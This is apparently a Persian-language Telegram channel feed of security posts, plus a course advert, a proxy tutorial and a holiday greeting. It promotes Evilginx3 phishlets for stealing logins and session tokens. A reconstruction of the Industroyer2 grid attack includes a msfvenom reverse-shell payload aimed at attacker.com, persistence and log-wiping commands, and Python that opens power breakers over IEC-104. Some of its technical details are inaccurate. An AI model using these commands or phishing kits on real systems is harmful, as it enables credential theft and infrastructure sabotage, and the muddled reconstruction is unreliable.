🎣 Evilginx3 Phishlets

•  شاید قبلاً اسم ابزار Evilginx رو شنیده باشید این یک reverse proxy (پروکسی معکوس) است که ارتباط بین کاربر و یک وب‌سایت هدف را از طریق خودش رد می‌کند و به شما امکان می‌دهد نام کاربری، رمز عبور و توکن‌های سشن را سرقت کنید. با استفاده از این فریم‌ورک حتی می‌توانید احراز هویت دو مرحله‌ای (2FA) را هم دور بزنید.

•  در Evilginx از چیزی به نام fishlet (فیشلت) استفاده می‌شود. فیشلت‌ها فایل‌های تنظیماتی هستند که رفتار اصلی Evilginx را تعیین می‌کنند. درون این فایل‌ها مشخص می‌کنید که چگونه وارد کردن نام کاربری و رمز عبور تشخیص داده شود، چه نوع کوکی‌های سشن وجود دارند و چطور آن‌ها را جمع‌آوری کنید تا حمله فیشینگ شما موفقیت‌آمیز باشد.

• خبر خوش اینکه تمامی این فیشلت‌ها را می‌توانید در یک ریپوزیتوری منظم پیدا کنید. لینک زیر:

https://github.com/simplerhacking/Evilginx3-Phishlets

در این ریپوزیتوری صفحات ورود (login) اصلی سرویس‌های بزرگ ابری مثل Google، AWS و Microsoft آماده شده است و همه‌چیز برای استفاده با Evilginx3 تنظیم شده است.

⚠️ نکته مهم: 
این مطالب فقط جنبه آموزشی و شناخت فنی دارند و صرفاً برای متخصصان امنیت اطلاعات و در محیط‌های کنترل‌شده تستی طراحی شده‌اند. 

استفاده غیرقانونی و سوء‌قصد به دیگران کاملاً غیراخلاقی و غیرمجاز است.

@TryHackBox

🎯 دوره آموزشی SEC504 مبتنی بر چالش

🔐 یادگیری استاندارد + تمرین عملی با چالش‌های واقعی امنیت سایبری

در این دوره ترکیبی و منحصربه‌فرد، هم سرفصل‌های استاندارد دوره SEC504 موسسه SANS را آموزش می‌بینید، و هم با ۱۰ چالش واقعی از پلتفرم Challenginno مهارت‌های عملی خود را تقویت می‌کنید.

✅ آموزش مفاهیم | ✅ تحلیل و Exploit آسیب‌پذیری‌ها | ✅ حل چالش و دریافت مدرک مهارتی

👨‍💻 مناسب برای:

علاقمندان به امنیت، تحلیلگران SOC، تیم‌های تست نفوذ، شرکت‌کنندگان قبلی CEH یا SEC504، و علاقمندان CTF

📚 سرفصل‌ها:
Recon – Scanning – Exploitation – Password Attacks – Post-Exploitation – Incident Handling

🎁 ویژگی‌های دوره:

✅ ۶ جلسه آموزش با محتوای رسمی SEC504
✅ حل کامل ۱۰ چالش واقعی + Write-up
✅ دسترسی ۳ ماهه به پلتفرم Challenginno
✅ مدرک مهارتی در صورت موفقیت در چالش نهایی
✅ وبینارهای تخصصی

🗓 شروع دوره: جمعه ۲۰ تیرماه
⏰ زمان برگزاری: جمعه‌ها، ساعت ۹ تا ۱۴

📩 برای ثبت‌نام یا دریافت اطلاعات بیشتر به لینک زیر مراجعه نمایید:

🌐 https://evnd.co/TsRDb

اگر سوالی در خصوص دوره دارید با آی دی enitp در ارتباط باشید

🔥 به تحقیق در مورد امنیت وردپرس علاقه دارید؟

محقق امنیتی، آناندا داکال، روش خود را برای پیدا کردن تزریق SQL غیرمجاز در افزونه WooCommerce Wishlist وردپرس شرکت TI به اشتراک می‌گذارد.

https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
#pentest #bugbounty #bestpractices
@TryHackBox

🔍 Merklemap
— یک موتور جستجوی جدید برای زیردامنه‌ها و گواهی‌های SSL/TLS. بهترین چیز وقتی که به شناسایی غیرفعال سریع نیاز دارید.

مثال:

=example.com, *ex*mple*, *.example.com

#tools #recon
@TryHackBox

🥷 دور زدن احراز هویت Ruby-SAML / GitLab (CVE-2024-45409)

چرا باید CVE های مختلف را مطالعه کنیم؟ حداقل برای گسترش افق دید شما در صنعت پیچیده ما و درک پیش‌نیازهای باگ‌ها. امروز، برای شما، یک آسیب‌پذیری حیاتی دیگر در GitLab را بررسی می‌کنیم که به شما امکان می‌دهد مکانیسم‌های احراز هویت SAML را دور بزنید و با استفاده از یک نقص در پردازش پاسخ SAML، به دسترسی غیرمجاز دست یابید.

🔶️ بخوانید

#CVE #writeup
@TryHackBox

⭕ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :

💠 کانال های تلگرام ما

🔶️ آموزش تست نفوذ و Red Team :
🆔 @TryHackBox

🔶️ رودمپ های مختلف :
🆔 @TryHackBoxOfficial

🔶️ داستان های هک :
🆔 @TryHackBoxStory

🔶️ آموزش برنامه نویسی :
🆔 @TryCodeBox

🔶️ رادیو زیروپاد ( پادکست ها ) :
🆔 @RadioZeroPod

➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox

ما در مجموعه TryHackBox به دنبال مدرسین باانرژی و خلاق هستیم تا به تیم ما بپیوندند. اگر علاقه‌مند به تدریس و انتقال تجربه‌هاتون هستید، خوشحال می‌شیم رزومه‌تون رو برامون ارسال کنید یا با ما تماس بگیرید. 

ما منتظر دریافت رزومه‌های شما هستیم تا به تیم ما بپیوندید!

میتوانید رزومه خود را به ادرس های زیر ارسال کنید :
@ThbxSupport

Email : tryhackbox@gmail.com

#سوال
چگونه یک مهاجم می تواند از سرویس های آسیب پذیر برای دستیابی به دسترسی اولیه بهره برداری کند؟

لینک گروه
https://news.1rj.ru/str/+XPV3S0tygl1lZGE0

تیرگان بر ایرانیان فرخنده باد.❤️

۱۰ تیر، روزی‌ست که در دل اساطیر ایران می‌درخشد؛
روزی که آرش کمانگیر، جان خویش را در تیر نهاد تا مرز ایران‌زمین را از فراز دماوند تا دوردست‌ها برساند.
تیرگان در تقویم ایران باستان، جشن آب، باران، تیر و پاکی‌ست. در این روز، ایرانیان به یاد آرش، برای باران دعا می‌کردند، در کوزه‌ها آب می‌ریختند، و با پاشیدن آب، دل‌ها را تازه می‌کردند.
جالب‌تر اینکه ابوریحان بیرونی این روز را «بزرگداشت نویسندگان» نیز دانسته؛ روزی برای پاسداشت اندیشه و واژه.
برخی روایت‌ها، تیرگان را در ۱۳ تیر دانسته‌اند، اما آن‌چه پابرجاست، خود یاد آرش و شکوه فرهنگ ایرانی‌ست

جشن تیرگان(جشن آب پاشان)
📖جشن تیرگان در تیر روز از تیرماه برابر با ۱۳ تیر در گاهشمار زرتشتی و ۱۰ تیر در گاهشمار جلالی برگزار می‌شود.
این جشن در گرامیداشت تیشتر(ستاره ی باران آور در فرهنگ ایرانی)است.
در روزشمارها تیرگان روز کمان‌ کشیدن آرش کمانگیر و پرتاب تیر از فراز البرز است.
همچنین جشن تیرگان به گفته ابوریحان بیرونی در آثارالباقیه، روز بزرگداشت جایگاه نویسندگان در ایران باستان بوده است.

@TryHackBox

🚨 نفوذ هکرها به تاسیسات آب آمریکا با رمز عبور پیش‌فرض "1111"

هفته گذشته، یک گروه هکری توانست فقط با استفاده از رمز عبور ساده و پیش‌فرض 1111 کنترل بخشی از سیستم مدیریت تاسیسات آب‌رسانی در یکی از ایالت‌های آمریکا را به‌دست بگیرد
این سیستم‌ها معمولاً برای کنترل فشار آب، ترکیب مواد شیمیایی تصفیه و سطح مخازن استفاده می‌شوند. هک شدن چنین سیستمی می‌تواند امنیت عمومی را به خطر بیندازد و بله، هنوز هم در سال 2025 چنین رمزهایی کار می‌کنند!

⚠️ وقتی یک سیستم حیاتی مثل آب‌رسانی یا برق، فقط با یک رمز ساده قابل هک باشد، نتایجش می‌تواند فاجعه‌بار باشد به عنوان مثال

- آلودگی عمدی آب آشامیدنی
- قطع گسترده برق یا اختلال در خدمات شهری
 ـ ارسال هشدارهای جعلی یا ایجاد وحشت عمومی
 ـ  حمله باج‌افزاری به بیمارستان، بانک یا اداره‌های دولتی
 - نفوذ به زنجیره تأمین کالاها و گسترش بدافزارها

✅ پیشنهاد میشه اگر شما هم از مودم، دوربین، دستگاه هوشمند یا حتی گوشی استفاده می‌کنید، موارد زیر را جدی بگیرید

     - هیچ‌وقت از رمز پیش‌فرض استفاده نکنید (مثل 1234 یا admin)
     - دستگاه‌های هوشمند را بدون رمز یا با پورت باز به اینترنت وصل نکنید
     - رمزها را هر چند وقت یک‌بار تغییر دهید
     - از احراز هویت دومرحله‌ای استفاده کنید، مخصوصاً در ایمیل، واتساپ و شبکه‌های اجتماعی

🟠 سخن نهایی
امنیت فقط مخصوص هکرها یا دولت‌ها نیست و همه ما در زنجیره امنیت نقش داریم.

📚 منبع اصلی خبر
https://thehackernews.com/2025/07/manufacturing-security-why-default.html

✍️نویسنده
@TryHackBox| The Chaos

#CyberSecurity #SCADA #ICS #Hacking #news #CriticalInfrastructure #IOTSecurity #IndustrialSecurity #CyberAttack #2025Security

🔖 بازگشت سایه‌ی استاکس‌نت – قسمت اول
حمله واقعی به زیرساخت برق اوکراین با Industroyer2

💠 حمله پیشرفته‌ای از نوع ICS Targeted Malware توسط گروه APT روسی (Sandworm) تو سال ۲۰۲۲، گروه هکری وابسته به اطلاعات نظامی روسیه (GRU) با نام Sandworm حمله‌ای بزرگ و واقعی به زیرساخت برق اوکراین انجام داد. این حمله نسخه‌ای ارتقایافته از بدافزار معروف استاکس‌نت بود که بهش لقب دادن:

Industroyer2

این حمله به‌قصد خاموشی گسترده و بی‌ثباتی در مناطق حساس در اوکراین طراحی شده بود، دقیقاً همزمان با حمله‌ی نظامی روسیه.
حالا تو این دو قسمت، این حمله رو در ۵ فاز عملیاتی بررسی می‌کنیم.

📌 فاز اول: شناسایی و جمع‌آوری اطلاعات از شبکه برق (ICS Recon)
هکرها قبل از حمله، با استفاده از ابزارها و تکنیک‌های OSINT و دسترسی اولیه به شبکه، ساختار سیستم برق و نوع تجهیزات ICS رو شناسایی کردن.

🛠 ابزارهای مورد استفاده:
< — Shodan — >
پیدا کردن PLCها و HMIهای متصل به اینترنت

< — Wireshark — >
برای بررسی پروتکل‌های صنعتی مثل IEC-104، Modbus, DNP3

< — Nmap — >
با اسکریپت‌های مخصوص ICS

< — FOCA — >
برای جمع‌آوری متادیتای فایل‌های منتشرشده توسط شرکت برق

< — Active Directory Enum — >
برای کشف سیستم‌های مهندسی در شبکه داخلی

اسکن نمونه با Nmap:

nmap -sS -p 2404 --noscript=modbus-discover 10.10.0.0/16 

استخراج اطلاعات PLC از ترافیک IEC-104 با Wireshark:
iec104.asdu.typeid == 45 || iec104.asdu.typeid == 46


📌 فاز دوم: ورود به شبکه و اجرای اولیه بدافزار
گزارش CERT-UA نشون می‌ده که Sandworm از حساب RDP یکی از مهندسین شبکه وارد سیستم شده و از طریق یک فایل آلوده بدافزار رو مستقر کرده.

🔶 روش‌های ورود
سرقت رمز عبور از طریق فیشینگ یا Keylogger
استفاده از RDP Credentialهای لو رفته
اجرای فایل EXE مخرب با دسترسی SYSTEM

نمونه بدافزار ساخته‌شده با msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > industroyer2.exe

ایجاد Persistence:

schtasks /create /tn "SCADA Sync" /tr "C:\ProgramData\industroyer2.exe" /sc onlogon /ru SYSTEM 

📌 فاز سوم: ارتباط مستقیم با PLC و تخریب زیرساخت
بدافزار Industroyer2 به‌صورت مستقیم به PLCهای شبکه برق وصل می‌شه و با استفاده از پروتکل IEC-104 دستور باز یا بسته‌کردن بریکرها (Breaker) رو صادر می‌کنه.

🔶 ساختار عملکرد بدافزار:
- اتصال TCP به پورت 2404 (IEC-104)
- ارسال دستور Single Command برای باز کردن بریکر
- ارسال دستور Double Command برای شبیه‌سازی فرمان مهندسی قانونی

نمونه کد Python برای باز کردن Breaker:

from iec104 import IEC104Client client = IEC104Client("10.0.0.12", 2404) client.connect() 
Cause = Spontaneous client.send_command(asdu_type=45, ioa=101, value=0) # breaker open client.disconnect() 

فایل کانفیگ شبکه در بدافزار:
{ "targets": [ {"ip": "10.0.0.12", "type": "siemens", "breaker_id": 101}, {"ip": "10.0.0.15", "type": "schneider", "breaker_id": 110} ], "payload_type": "iec104", "command": "breaker_open" }


📌 فاز چهارم: پاکسازی ردپا و لاگ‌ها
بعد از اجرا، بدافزار تلاش می‌کنه ردپاهای خودش رو پاک کنه

دستورات استفاده‌شده:

wevtutil cl System wevtutil cl Application Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force 

📌 فاز پنجم: شناسایی حمله و مقابله توسط CERT-UA
مرکز پاسخ اضطراری اوکراین تونست حمله رو در لحظه آخر شناسایی کنه.
تحلیل نمونه Industroyer2 نشون داد که فقط روی سیستم‌های خاص با تجهیزات SCADA فعال می‌شه.
با بررسی لاگ‌های شبکه و دسترسی مشکوک از RDP کشف و فایل EXE با نام جعلی update_driver.exe روی سیستم مهندسین دیده شد.

🔶 روش‌های دفاعی پیشنهادی
- استفاده از ابزارهای تخصصی ICS مانند Nozomi و Dragos
- ایزوله‌کردن کامل سیستم‌های SCADA و PLC از شبکه IT
- بررسی ترافیک پورت 2404 با Suricata/Zeek برای دستورات مشکوک
- تحلیل Signatureهای پروتکل IEC-104

📌 این حمله ادامه‌ی استاکس‌نت بود؛ با دقت بیشتر، طراحی خاص برای اوکراین و قابلیت اجرای فرمان مستقیم روی شبکه برق. این حمله نشون داد که تو دنیای جنگ‌های مدرن، کلید برق یه کشور می‌تونه با یه packet خاموش بشه.

✍️نویسنده
@TryHackBox| Condor

#ICS #SCADA #CyberWarfare #APT #Industroyer #InfoSec

🚀 آموزش Proxies (پارت 0)

📌 پروکسی‌ها در واقع واسطه‌هایی هستند که بین کلاینت‌ها و سرورها قرار می‌گیرند و به عنوان یک سرور پروکسی عمل می‌کنند. باهم درباره‌ی سرورهای پروکسی صحبت می‌کنیم که چگونه درخواست‌های HTTP را بین طرفین (کلاینت و سرور) به جلو و عقب منتقل می‌کنند.

🔍 مباحثی که در سری پست ها به آن‌ها پرداخته می‌شود:
✅ نحوه قرارگیری پروکسی‌ها در مقابل دروازه‌ها و استقرار آن‌ها در HTTP
✅ راه‌هایی که پروکسی‌ها می‌توانند مفید باشند و به ما کمک کنند
✅ نحوه استقرار پروکسی‌ها در شبکه‌های واقعی و هدایت ترافیک به سرورهای پروکسی
✅ روش پیکربندی مرورگر برای استفاده از پروکسی
✅ تفاوت درخواست‌های پروکسی با درخواست‌های مستقیم به سرور و تأثیر پروکسی‌ها بر رفتار مرورگرها
✅ چگونگی ردیابی مسیر درخواست‌ها با استفاده از هدرهای Via و متد TRACE
✅ کنترل دسترسی مبتنی بر پروکسی در HTTP
✅ تعامل پروکسی‌ها با سرورها و کلاینت‌هایی که نسخه‌ها و ویژگی‌های متفاوتی از HTTP را پشتیبانی می‌کنند

✍️نویسنده
@TryHackBox| The Chaos

#HTTP #Proxy #CyberSecurity

📌 پروکسی‌ها در واقع واسطه‌هایی هستند که بین کلاینت‌ها و سرورها قرار می‌گیرند و مانند یک نماینده عمل می‌کنند.

🌍 مثال روزمره:
فرض کنید می‌خواهید نامه‌ای به یک شرکت بفرستید، اما به جای ارسال مستقیم، آن را به دفتر پستی می‌سپارید. دفتر پستی نامه را دریافت می‌کند، آدرس را بررسی می‌کند، سپس آن را به مقصد نهایی می‌رساند. حتی ممکن است قبل از ارسال، محتوای نامه را بررسی کند یا آن را در یک پاکت جدید بگذارد.

🔹 پروکسی هم دقیقاً همین‌طور کار می‌کند!

وقتی شما به اینترنت متصل می‌شوید، درخواست‌های شما ابتدا به پروکسی می‌رود.

پروکسی می‌تواند درخواست را تغییر دهد، فیلتر کند یا کش کند و سپس به سرور اصلی ارسال کند.

پاسخ سرور هم ابتدا به پروکسی برمی‌گردد و بعد به شما می‌رسد.

💡 پروکسی مثل همان دفتر پستی است: واسطه‌ای که ارتباط شما با دنیای اینترنت را مدیریت می‌کند!

🔍 واسطه‌های وب (Web Intermediaries) چیستند؟

تصور کنید می‌خواهید با یک فروشگاه آنلاین ارتباط برقرار کنید:

📱 بدون پروکسی (ارتباط مستقیم):
شما (کلاینت) ← مستقیماً به فروشگاه (سرور)

🖥 با پروکسی (ارتباط با واسطه):
شما ← پروکسی ← فروشگاه

✨ به زبان ساده:
پروکسی مثل یک رابط هوشمند عمل می‌کند که:

     - درخواست‌های شما را دریافت می‌کند

     - به جای شما با سرور اصلی ارتباط برقرار می‌کند

     - پاسخ را از سرور گرفته

     - و در نهایت آن را به شما تحویل می‌دهد

💡 مثل یک مترجم یا نماینده: دقیقاً همانطور که در مذاکرات بین‌المللی از مترجم استفاده می‌شود، پروکسی هم بین شما و سرورهای اینترنتی واسطه می‌شود تا ارتباط به بهترین شکل ممکن برقرار شود.

🌐 نحوه عملکرد:

     - بدون پروکسی، کلاینت‌ها مستقیماً با سرورهای HTTP ارتباط برقرار می‌کنند

     - با وجود پروکسی، کلاینت با سرور پروکسی صحبت می‌کند

     - پروکسی به نمایندگی از کلاینت با سرور اصلی ارتباط برقرار می‌نماید

     - کلاینت تراکنش را کامل انجام می‌دهد، اما از خدمات ارزشمند پروکسی بهره می‌برد

🔄 ویژگی‌های کلیدی:

     - هم به عنوان سرور وب (برای کلاینت)

     - هم به عنوان کلاینت وب (برای سرور اصلی) عمل می‌کند

     - درخواست‌های HTTP را به سرورهای مناسب ارسال می‌کند

     - اتصالات و درخواست‌ها را مدیریت می‌نماید

     - پاسخ‌ها را دقیقاً مانند یک وب سرور بازمی‌گرداند

⚙️ مهم‌ترین وظایف:

     - ارسال درخواست‌های HTTP به سرورها

     - دریافت و پردازش پاسخ‌ها

     - رعایت دقیق پروتکل‌های HTTP

     - مدیریت صحیح تراکنش‌ها بین کلاینت و سرور

✍️نویسنده
@TryHackBox| The Chaos

#HTTP #Proxy #CyberSecurity

🔥 نمونه‌ای از چک‌لیست برای یک buughunter و pentester با 500 مورد تست، بر اساس OWASP.

#bugbounty
@TryHackBox